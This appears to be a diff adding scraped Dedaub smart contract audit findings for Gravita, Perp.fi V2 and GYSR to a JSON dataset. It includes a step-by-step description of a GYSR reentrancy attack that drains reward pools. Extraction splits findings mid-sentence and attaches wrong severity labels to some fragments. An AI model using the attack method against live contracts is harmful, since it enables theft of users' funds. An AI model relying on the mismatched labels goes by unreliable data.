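A defensive alternative is to bound how old the fallback value may be. Sketch only (the timestamp mapping and the constant are hypothetical, not part of the audited code): record lastGoodPriceTimestamp[_token] = block.timestamp; whenever a fresh price is stored, and on the fallback path require(block.timestamp - lastGoodPriceTimestamp[_token] <= MAX_FALLBACK_PRICE_AGE, \"PriceFeed: stale fallback price\"); so that a long-dead oracle surfaces as an explicit error rather than an arbitrarily old price.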
L5 AdminContract::sanitizeParameters has no access control RESOLVED (58a41195) The function sets important collateral data (to default values) yet has no access control, unlike, e.g., the almost-equivalent setAsDefault, which is onlyOwner. Although there are many other safeguards that ensure that collateral is valid, we recommend tightening the access control for sanitizeParameters as well. function sanitizeParameters(address _collateral) external { if (!collateralParams[_collateral].hasCollateralConfigured) { _setAsDefault(_collateral); } } function setAsDefault(address _collateral) external onlyOwner { _setAsDefault(_collateral); } CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) ", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "contracts can mint arbitrarily large amounts of debt tokens ", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": " INFO (acknowledged) The role of the whitelisted contracts is not completely clear to us. There is only one related comment in DebtToken.sol : // stores SC addresses that are allowed to mint/burn the token (AMO strategies,", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "mapping(address => bool) public whitelistedContracts; These contracts can mint debt tokens without depositing any collateral by calling DebtToken::mintFromWhitelistedContract. This could be a serious problem if such a contract were malicious. Also, even if these contracts work as expected, minting debt tokens without providing any collateral could have a serious impact on the price of the debt token. N2 Protocol owners can set crucial parameters INFO (acknowledged) Key functionality is trusted to the owner of various contracts. Owners can set the kinds of collateral accepted, the oracles that are used to price collateral, etc. Thus, protocol owners should be trusted by users. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "struct Vessel (IVesselManager.sol), asset is unnecessary ", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": " INFO Field asset of struct Vessel is currently unused. Vessel records are currently only used in a mapping that has the asset as the key, so there is no need to read the asset from the Vessel data. In FeeCollector::_decreaseDebt no need to check for", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "fees if the expiration time of the refunding is block.timestamp INFO In the code below if (mRecord.to < NOW) { _closeExpiredOrLiquidatedFeeRecord(_borrower, _asset, mRecord.amount); } the < can be replaced by <=, since when mRecord.to == NOW there is nothing left for the user to refund.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "event INFO The following event is declared in IAdminContract.sol but not used anywhere: event MaxBorrowingFeeChanged(uint256 oldMaxBorrowingFee, uint256 newMaxBorrowingFee);", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "storage variables INFO The storage mapping StabilityPool::pendingCollGains and the code accessing it are unnecessary, since the information is never set to non-zero values. // Mapping from user address => pending collaterals to claim still // Must always be sorted by whitelist to keep leftSumColls functionality mapping(address => Colls) pendingCollGains; ... function getDepositorGains(address _depositor) public view returns (address[] memory, uint256[] memory) { // Add pending gains to the current gains return ( collateralsFromNewGains, _leftSumColls( Colls(collateralsFromNewGains, amountsFromNewGains), pendingCollGains[_depositor].tokens, pendingCollGains[_depositor].amounts ) ); } ... function _sendGainsToDepositor( address _to, address[] memory assets, uint256[] memory amounts ) internal { ... // Reset pendingCollGains since those were all sent to the borrower Colls memory tempPendingCollGains; pendingCollGains[_to] = tempPendingCollGains; } Also, StabilityPool::controller is unused and never set: IAdminContract public controller; Finally, the variables activePool and defaultPool in GravitaBase seem unused and not set (at least for most subcontracts of GravitaBase). IActivePool public activePool; IDefaultPool internal defaultPool;", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "is really just a transfer INFO In StabilityPool::_sendGainsToDepositor, it is not clear why the transferFrom is not merely a transfer. 
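Using safeTransfer would have the same effect without the self-allowance that ERC20 transferFrom implementations typically demand even when from is the caller itself; sketch of the equivalent call (our suggestion, not the project's code): IERC20Upgradeable(asset).safeTransfer(_to, amount); The code in question: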
function _sendGainsToDepositor( address _to, address[] memory assets, uint256[] memory amounts ) internal { for (uint256 i = 0; i < assetsLen; ++i) { IERC20Upgradeable(asset).safeTransferFrom(address(this), _to, amount); } }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "with more than 18 decimals are not supported INFO Tokens with more than 18 decimals are not supported, based on the SafetyTransfer library (outside the audit scope). function decimalsCorrection(address _token, uint256 _amount) internal view returns (uint256) { if (_token == address(0)) return _amount; if (_amount == 0) return 0; uint8 decimals = ERC20Decimals(_token).decimals(); if (decimals < 18) { return _amount.div(10**(18 - decimals)); } return _amount; // Dedaub: more than 18 not supported correctly! } We do not recommend trying to address this, as it may introduce other complexities for very little practical benefit. Instead, we recommend just being aware of the limitation.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "statement (consisting of a mere expression) INFO In BorrowerOperations::openVessel, the following expression (used as a statement!) is a no-op: vars.debtTokenFee;", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "external function, not called as expected INFO BorrowerOperations::moveLiquidatedAssetToVessel appears not to be used in the protocol. // Send collateral to a vessel. Called by only the Stability Pool. function moveLiquidatedAssetToVessel( address _asset, uint256 _amountMoved, address _borrower, address _upperHint, address _lowerHint ) external override { _requireCallerIsStabilityPool(); _adjustVessel(_asset, _amountMoved, _borrower, 0, 0, false, _upperHint, _lowerHint); }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "isInitialized flags INFO The following pattern over the storage variable isInitialized appears in several contracts but should be entirely unnecessary, due to the presence of the initializer modifier. bool public isInitialized; function setAddresses(...) external initializer { require(!isInitialized); isInitialized = true; } Contracts with the pattern include FeeCollector, PriceFeed, ActivePool, CollSurplusPool, DefaultPool, SortedVessels, StabilityPool, VesselManager, VesselManagerOperations, CommunityIssuance, GRVTStaking.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "INFO The codebase exhibits some old code patterns (which we do not recommend fixing, since they directly mimic the trusted Liquity code): The use of assert for condition checking (instead of require/if-revert). (Some of the asserts have been replaced, but not all.) 
The use of SafeMath instead of relying on Solidity 0.8.* checks.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "and error-prone use of this.* INFO Some same-contract function calls are made with the pattern this.func(), which causes a new internal transaction and changes the msg.sender. This should be avoided for clarity and (gas) performance. In VesselManager: function isVesselActive(address _asset, address _borrower) public view override returns (bool) { return this.getVesselStatus(_asset, _borrower) == uint256(Status.active); } In PriceFeed (and also note the unusual convention of 0 = ETH): function _calcEthPrice(uint256 ethAmount) internal returns (uint256) { uint256 ethPrice = this.fetchPrice(address(0)); // Dedaub: Also, why the convention that 0 = ETH? return ethPrice.mul(ethAmount).div(1 ether); } function _fetchNativeWstETHPrice() internal returns (uint256 price) { uint256 wstEthToStEthValue = _getWstETH_StETHValue(); OracleRecord storage stEth_UsdOracle = registeredOracles[stethToken]; price = stEth_UsdOracle.exists ? this.fetchPrice(stethToken) : _calcEthPrice(wstEthToStEthValue); _storePrice(wstethToken, price); } Compatibility of PriceFeed::_fetchPrevFeedResponse,", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "with future versions of the Chainlink Aggregator INFO The roundId returned by the Chainlink AggregatorProxy contract is a uint80. The 16 most significant bits keep the phaseId (incremented every time the underlying aggregator is updated) and the other 64 bits keep the roundId of the aggregator. As long as the underlying aggregator is the same, the roundId returned by the proxy will increase by one in each new round, but on an update of the aggregator contract the proxy roundId will not increment by 1, since the phaseId will also change. In this case the previous round is not current_roundId-1, and _fetchPrevFeedResponse will not return the price data from the previous round (which was a round of the previous aggregator). We mention this issue although the probability that the protocol fetches a price at the time of an update of a Chainlink oracle is relatively small, as each round lasts a few minutes to an hour. PriceFeed::_isValidResponse does all the validity checks necessary for the current Chainlink Aggregator version. Chainlink's AggregatorProxy::latestRoundData also returns two extra values, uint256 startedAt and uint80 answeredInRound, which, for the current version, do not hold extra information (i.e. answeredInRound == roundId), but in past and possibly future versions they could be used for some extra validity checks, e.g. answeredInRound >= roundId.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 
23.pdf", + "body": "code In BorrowerOperations: function _requireNonZeroAdjustment( uint256 _collWithdrawal, uint256 _debtTokenChange, uint256 _assetSent ) internal view { require( msg.value != 0 || // Dedaub: `msg.value != 0` not possible _collWithdrawal != 0 || _debtTokenChange != 0 || _assetSent != 0, \"BorrowerOps: There must be either a collateral change or a debt change\" ); } The condition msg.value != 0 is not possible, as ensured in the single place where this function is called (_adjustVessel). The condition should be kept if the function is to be usable elsewhere in the future. Similarly, in VesselManager, the condition marked with a comment below seems unnecessary, given that the arithmetic is compiler-checked. function decreaseVesselDebt( address _asset, address _borrower, uint256 _debtDecrease ) external override onlyBorrowerOperations returns (uint256) { uint256 oldDebt = Vessels[_borrower][_asset].debt; if (_debtDecrease == 0) { return oldDebt; // no changes } uint256 paybackFraction = (_debtDecrease * 1 ether) / oldDebt; uint256 newDebt = oldDebt - _debtDecrease; Vessels[_borrower][_asset].debt = newDebt; if (paybackFraction > 0) { if (paybackFraction > 1 ether) { // Dedaub: Impossible. The \"-\" would have reverted, three lines above paybackFraction = 1 ether; } feeCollector.decreaseDebt(_borrower, _asset, paybackFraction); } return newDebt; }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "ownable policy INFO Some contracts are defined to be Ownable (using the OZ libraries), yet do not use this capability (beyond initialization). These include: StabilityPool initializes Ownable and relinquishes ownership, but never checks ownership in setAddresses, or elsewhere. function setAddresses( address _borrowerOperationsAddress, address _vesselManagerAddress, address _activePoolAddress, address _debtTokenAddress, address _sortedVesselsAddress, address _communityIssuanceAddress, address _adminContractAddress ) external initializer override { __Ownable_init(); renounceOwnership(); // Dedaub: The function was onlyOwner in Liquity, here there's // no point of Ownable } VesselManagerOperations inherits and initializes ownable functionality, but is it used? function setAddresses( address _vesselManagerAddress, address _sortedVesselsAddress, address _stabilityPoolAddress, address _collSurplusPoolAddress, address _debtTokenAddress, address _adminContractAddress ) external initializer { __Ownable_init(); // YS:! why? }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "explicit check in BorrowerOperations::openVessel that the collateral deposited by the user is approved INFO If a user attempts to open a Vessel with a collateral asset not approved by the owner, the transaction will fail, because there will be no price oracle registered for this asset. Therefore it is checked that the user deposits an approved collateral asset, but only indirectly. It would be better if there were an explicit check.
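A direct check at the top of openVessel would make the intent explicit; sketch only (the getter name is hypothetical, assuming BorrowerOperations can query the AdminContract's collateralParams, and the revert string is ours): require(adminContract.getIsCollateralConfigured(vars.asset), \"BorrowerOps: collateral not approved\");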
", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "only partially initializes the collateralParams structure INFO We cannot find a specific problem with the current, only partial, initialization, since even if the owner just adds a new _collateral and does not set all the fields of collateralParams[_collateral], the protocol sets the default values for these upon the opening of a Vessel. But in general it is not good practice to leave uninitialized variables, and it would be better if in addNewCollateral the owner also set the default values for the remaining collateralParams elements.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "internal functions INFO In StabilityPool, the following two functions are unused. function _requireUserHasVessel(address _depositor) internal view { address[] memory assets = adminContract.getValidCollateral(); uint256 assetsLen = assets.length; for (uint256 i; i < assetsLen; ++i) { if (vesselManager.getVesselStatus(assets[i], _depositor) == 1) { return; } } revert(\"StabilityPool: caller must have an active vessel to withdraw AssetGain to\"); } function _requireUserHasAssetGain(address _depositor) internal view { (address[] memory assets, uint256[] memory amounts) = getDepositorGains(_depositor); for (uint256 i = 0; i < assets.length; ++i) { if (amounts[i] > 0) { return; } } revert(\"StabilityPool: caller must have non-zero gains\"); }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "mistakes in names or comments INFO This issue collects several items, all superficial, but easy to fix. AdminContract: uint256 public constant PERCENT_DIVISOR_DEFAULT = 100; // dividing by 100 yields 0.5% // Dedaub: No, it yields 1% AdminContract: function setAsDefaultWithRemptionBlock( // Dedaub: spelling AdminContract: struct CollateralParams { ... uint256 redemptionBlock; // Dedaub: misnamed, it's in seconds } (We advise special caution, since the field is set in two ways, so external callers may be confused by the name and pass a block number, whereas the calculation is in terms of seconds.) StabilityPool: // Internal function, used to calculcate ... PriceFeed: * - If price decreased, the percentage deviation is in relation to the the FeeCollector: function _createFeeRecord( address _borrower, address _asset, uint256 _feeAmount, FeeRecord storage _sRecord ) internal { uint256 from = block.timestamp + MIN_FEE_DAYS * 24 * 60 * 60; // Dedaub: `1 days` is the best way to write this, as done // elsewhere in the code", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "for gas optimization INFO Gas savings were not a focus of the audit, but there are some clear instances of repeat work or missed opportunities for immutable fields. StabilityPool: function receivedERC20(address _asset, uint256 _amount) external override { ... totalColl.amounts[collateralIndex] += _amount; uint256 newAssetBalance = totalColl.amounts[collateralIndex]; ... } The two highlighted lines (likely) perform two SLOADs and one SSTORE. Using an intermediate temporary variable for the sum will save an SLOAD.
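Sketch of the suggested rewrite (abbreviated; the surrounding logic is elided): uint256 newAssetBalance = totalColl.amounts[collateralIndex] + _amount; // single SLOAD totalColl.amounts[collateralIndex] = newAssetBalance; // single SSTORE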
DebtToken: the following variable is only set in the constructor and could be declared immutable. address public timelockAddress;", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "constants INFO Our recommendation is for all numeric constants to be given a symbolic name at the top of the contract, instead of being interspersed in the code. VesselManagerOperations::getRedemptionHints: collLot = collLot * REDEMPTION_SOFTENING_PARAM / 1000; AdminContract::setAsDefaultWithRedemptionBlock: if (blockInDays > 14) { ... BorrowerOperations::openVessel: contractsCache.vesselManager.setVesselStatus(vars.asset, msg.sender, 1); // Dedaub: 1 stands for \"active\", but is obscure", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "inconsistent INFO Contract IDebtToken is not really an interface, since it contains full ER", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "functionality.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Critical" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "allowed deviation between two consecutive oracle prices seems to be too high INFO In PriceFeed.sol there is a MAX_PRICE_DEVIATION_FROM_PREVIOUS_ROUND constant set to 5e17, i.e. 50%. If the percentage deviation of two consecutive Chainlink responses is greater than this constant, the protocol rejects the new price as invalid. But the value of this constant seems to be too high. Moreover, we think it would be better if the protocol used a different MAX_PRICE_DEVIATION_FROM_PREVIOUS_ROUND for each collateral asset, also taking into account the volatility of the asset. A23 Compiler bugs INFO The code has the compiler pragma ^0.8.10. For deployment, we recommend no floating pragmas, i.e., a fixed version, for predictability. Solc version 0.8.10, specifically, has some known bugs, which we do not believe affect the correctness of the contracts.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", "body": "allows any msg.sender to send Ether RESOLVED ETH deposited into the Vault contract is converted to WETH by being deposited into the WETH contract. A user wishing to withdraw their ETH needs to call the withdrawEther method, which in turn calls the withdraw method of the WETH contract. As part of the unwrapping procedure of WETH, ETH is sent back to the Vault contract, which needs to be able to receive it and thus defines the special receive() method. It is expected (mentioned in a comment) that the receive() method will only be used to receive funds sent by the WETH contract. However, there is no check enforcing this assumption, allowing practically anyone to send ETH to the contract. We believe that the current version of the code is not susceptible to any attacks that could try to manipulate the accounting of ETH performed by the Vault. 
Still, we cannot guarantee that no attack vectors will arise as the codebase evolves and thus suggest adding a check on the msg.sender as follows: receive() external payable { require(_msgSender() == _WETH9, \"msg.sender is not WETH\"); } OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them.", "labels": [ "Dedaub", "Perp.fi V2", "Severity: Low" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", "body": "allows 0 value withdrawals ACKNOWLEDGED The Vault contract allows 0 value withdrawals through its external withdraw and withdrawEther methods. We believe that adding a requirement that a withdrawal's amount should be greater than 0 would improve user experience and prevent the unnecessary spending of gas on user error. [The suggestion has been acknowledged by the protocol's team and might be implemented in a future release.]", "labels": [ "Dedaub", "Perp.fi V2", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", "body": "allows 0 value liquidations ACKNOWLEDGED The Vault contract allows 0 value liquidations through its liquidateCollateral method. Disallowing such liquidations will protect users from unnecessarily spending gas in case they make a mistake. [The suggestion has been acknowledged by the protocol's team and might be implemented in a future release.]", "labels": [ "Dedaub", "Perp.fi V2", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", "body": "gas optimization RESOLVED Internal method Vault::_modifyBalance allows the amount parameter to be 0. This behavior is intended, as it is clearly documented in a comment. Nevertheless, when amount is 0, no changes are applied to the contract's state, as can be seen below: function _modifyBalance( address trader, address token, int256 amount ) internal { // Dedaub: code has no effects on storage, still consumes some gas int256 oldBalance = _balance[trader][token]; int256 newBalance = oldBalance.add(amount); _balance[trader][token] = newBalance; if (token == _settlementToken) { return; } // register/deregister non-settlement collateral tokens if (oldBalance != 0 && newBalance == 0) { // Dedaub: execution will not reach here when amount is 0 // .. } else if (oldBalance == 0 && newBalance != 0) { // Dedaub: execution will not reach here when amount is 0 // .. } } oldBalance and newBalance are equal when amount is 0, thus no state changes get applied. Still, some gas is consumed, which can be avoided if the method is changed to return early when amount is 0.", "labels": [ "Dedaub", "Perp.fi V2", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", "body": "gas optimization RESOLVED Method _getAccountValueAndTotalCollateralValue calls the AccountBalance contract's method getPnlAndPendingFee twice, once directly and once in the call to _getSettlementTokenBalanceAndUnrealizedPnl in _getTotalCollateralValue. 
The first call to getPnlAndPendingFee to get the unrealized PnL could be removed if the code were restructured appropriately to reuse the value returned by _getSettlementTokenBalanceAndUnrealizedPnl. A5 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaffected. CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts wields considerable power over the protocol, including changing the contracts holding the users' funds and adding tokens, which potentially means borrowing tokens using fake collateral, etc. In addition, the owner of the protocol has total control of several protocol parameters: - the collateral ratio of tokens - the discount ratio (applicable in liquidation) - the deposit cap of tokens - the maximum number of different collateral tokens for an account - the maintenance margin buffer ratio - the allowed ratio of debt in non-settlement tokens - the liquidation ratio - the insurance fund fee ratio - the debt threshold - the collateral value lower (dust) limit In case the aforementioned parameters are decided by governance in future versions of the protocol, collateral ratios should be approached in a really careful and methodical way. We believe that a more decentralized approach would be to alter these weights in a specific way defined by predetermined formulas (taking into consideration the volatility and liquidity available on-chain) and allow only small adjustments by governance.", "labels": [ "Dedaub", "Perp.fi V2", "Severity: Informational" ] }, { "title": "shares can be devalued and drained by the controller via a reentrancy attack ", "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", "body": " RESOLVED This vulnerability arises from two separate issues in different parts of the code: 1. The TokenUtils::receiveAmount/receiveWithFee functions compute the amount of received tokens as the difference in balance before and after the transfer. TokenUtils::receiveAmount() function receiveAmount( IERC20 token, uint256 shares, address sender, uint256 amount ) internal returns (uint256) { // transfer uint256 total = token.balanceOf(address(this)); token.safeTransferFrom(sender, address(this), amount); uint256 actual = token.balanceOf(address(this)) - total; // mint shares at current rate uint256 minted = (total > 0) ? (shares * actual) / total : actual * INITIAL_SHARES_PER_TOKEN; require(minted > 0); return minted; } The goal is to support different types of tokens (e.g. tokens with transfer fees). This approach, however, introduces a possible attack vector: the code could miscalculate the amount of tokens transferred if some other action is executed in between the two balance readings. Note that token.safeTransferFrom() is an external call outside our control. As such, we cannot exclude the possibility that it returns execution to the adversary (e.g. via a transfer hook). 2. The fund() function of all reward modules has no reentrancy guards (likely due to the fact that funding sounds \"harmless\"; we send tokens to the contract without getting anything back). The possible attack: We assume a malicious controller that creates a pool with ERC20FixedRewardModule (for simplicity). His goal is to receive the benefits of staking without giving any rewards back. The reward token used in the pool is a legitimate trusted token. 
We only assume that it has some ERC777-type transfer hook (or any mechanism to notify the sender when a transferFrom happens). 1. The adversary funds the reward module and waits until several users have staked tokens (giving them rights to reward tokens). 2. He then initiates a series of k nested calls to ERC20FixedRewardModule::fund as follows: ERC20FixedRewardModule::fund() function fund(uint256 amount) external { require(amount > 0, \"xrm4\"); (address receiver, uint256 feeRate) = _config.getAddressUint96( keccak256(\"gysr.core.fixed.fund.fee\")); uint256 minted = _token.receiveWithFee( rewards, msg.sender, amount, receiver, feeRate ); rewards += minted; emit RewardsFunded(address(_token), amount, minted, block.timestamp); } a. He calls fund() with an infinitesimal amount (say 1 wei). fund calls receiveWithFee, which registers the initial total = balanceOf(this) and calls token.safeTransferFrom. TokenUtils::receiveWithFee() function receiveWithFee(...) internal returns (uint256) { uint256 total = token.balanceOf(address(this)); uint256 fee; if (feeReceiver != address(0) && feeRate > 0 && feeRate < 1e18) { fee = (amount * feeRate) / 1e18; token.safeTransferFrom(sender, feeReceiver, fee); } token.safeTransferFrom(sender, address(this), amount - fee); uint256 actual = token.balanceOf(address(this)) - total; uint256 minted = (total > 0) ? (shares * actual) / total : actual * INITIAL_SHARES_PER_TOKEN; require(minted > 0); return minted; } b. The latter passes control to the adversary (via a send hook), who makes a nested call to fund, again with amount = 1 wei, which again leads to a new token.safeTransferFrom. c. The process continues until the k-th call, which is now made with a larger amount = N. The adversary stops making nested calls, so the previous calls finish their execution starting from the most nested one. d. The last (k-th) call computes actual as the difference between the two balances, which will be equal to N tokens. This causes rewards to be incremented by the corresponding amount of shares (= (rewards * N) / total). e. Now execution returns to the (k-1)-th call, for which the actual transferred amount was just 1 wei. However, the difference of balances includes the nested k-th call, so actual will be found to be N (not 1 wei), causing rewards to be incremented again by the same amount of shares. f. The same happens with all outer calls, causing rewards to be incremented by k times more shares than they should! 3. The previous step essentially devalued each reward share, since we printed k times more shares than we should have. Note that the controller can withdraw all funds except those corresponding to the shares in debt. But these are now worth less, so the adversary can withdraw more reward tokens than he should. By picking k to be as large as the stack allows, and a large value of N (possibly using a flash loan), the controller can drain almost all reward tokens from the pool, leaving users with no rewards. Note that the other reward modules are also likely vulnerable, since they all call receiveWithFee and have no reentrancy guard. To prevent this vulnerability, reentrancy guards should be added to all fund methods. Moreover, TokenUtils::receiveAmount could check that the actual transferred amount is no larger than the expected one. This check would still support tokens with transfer fees, but would catch attacks like the one reported here.
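A sketch of such a check inside receiveAmount (one added line; the revert string is ours): uint256 actual = token.balanceOf(address(this)) - total; require(actual <= amount, \"GYSR: received more than expected\"); Nested fund() calls would then revert, since every outer frame observes a balance difference inflated by the inner transfers.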
Resolution: This vulnerability was fixed by addressing both issues that enabled it. Specifically: a check was added in TokenUtils::receiveAmount to ensure that the transferred amount is no larger than the expected one, and reentrancy guards were added to the fund function. HIGH SEVERITY: [No high severity issues] MEDIUM SEVERITY: ", "labels": [ "Dedaub", "GYSR - Mar '23", "Severity: Critical" ] }, { "title": "use of the factory contracts is only enforced off-chain WONT FIX The proper way to deploy a pool and its modules is via the factory contracts. These contracts ensure that the pool is initialized with proper values that prevent a potentially malicious controller from stealing the investors' funds. However, the use of factory contracts is only checked off-chain. PoolFactory keeps a list of contracts it created, and this list is presumably used by the GYSR UI to allow users to interact only with officially created contracts. On the other hand, anyone could still create their own Pool contracts and manually initialize them in any way. Such contracts would have source code identical to the legitimate ones, and it would be hard to recognize them. They would also be clearly unsafe: by using malicious staking and reward modules, or even a fake GYSR token, an adversary could easily steal all the funds deposited by investors. Although the off-chain checks would ensure that no user actually interacts with such contracts, such checks are inherently less reliable than on-chain ones. It would be preferable to ensure that contracts with bytecode identical to the official ones can never be improperly initialized, for instance by only allowing their constructor to be called by a factory contract. Resolution: This issue largely concerns off-chain aspects and cannot be fully addressed on-chain. As a consequence, it will be addressed by adding clear documentation explaining how to verify the validity of a deployed contract. M2 Unstaking in ERC20FixedRewardModule is inconsistent under different use cases RESOLVED The ERC20FixedRewardModule was updated as part of the PR #38 mentioned in the ABSTRACT section. The fundamental functions for the users are stake, unstake and claim. When a user stakes, the pos.debt field holds their potential rewards if they stake for the entire predefined period. However, a user can always claim their rewards for the amount already vested. Here are two scenarios of the same logic that are treated differently: Case #1: The first case assumes that users will not stake more than once. This happens when this reward module is combined with the ERC20BondStaking module, since users can't stake twice with a bond. However, if they unstake early, to recover the remaining principal, their rewards earning ratio should also be reduced. In order for the reward module to achieve this, it treats the user shares as if they were all vesting together. So, when a user unstakes early, only a percentage of all user shares have vested, resulting in the loss of a portion of the earning power, as intended. Case #2: The second case is when users can stake more than once. This can happen when this module is combined with other staking modules, like ERC20StakingModule for example. Then, when a user stakes again, the function calculates the rewards earned up to that point, updates their records and rolls over the remaining (unvested) amount with the newly added one to start vesting from that point forward. This approach treats the user shares as if they were vesting linearly and not all together, which means that the user won't lose his earning power. 
A detailed example illustrating the inconsistency between the 2 cases is provided in the APPENDIX of this report. Resolution: This issue was addressed by modifying the staking logic to remove the inconsistency. LOW SEVERITY: ID Description ", "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", "body": " L1 Approximation errors in ERC20BondStakingModule RESOLVED ERC20BondStakingModule needs to perform vesting and debt decay on multiple amounts, which however have different vesting/decay periods. To perform this operation in O(1) an approximation method is used, where vesting/decay happens for the whole amount simultaneously, and the period is essentially restarted in every update. This method necessarily introduces an approximation error. If multiple updates happen, the resulting values could be substantially lower than the actual ones. What is particularly problematic is that such delays can be produced by events that do not add new value to the system. For instance, vesting a large amount could be substantially delayed by staking (maliciously or coincidentally) small amounts. With just 5 updates, the amount vested at the end of the period will be only 67% of the total (each restart rescales the unvested remainder, so five evenly spaced updates vest 1 - (4/5)^5, approximately 67%). Note that there is also an \"opposite extreme\" strategy: instead of restarting the period on every update, we could choose to never restart until the current amount is fully vested. Of course, this method also introduces an 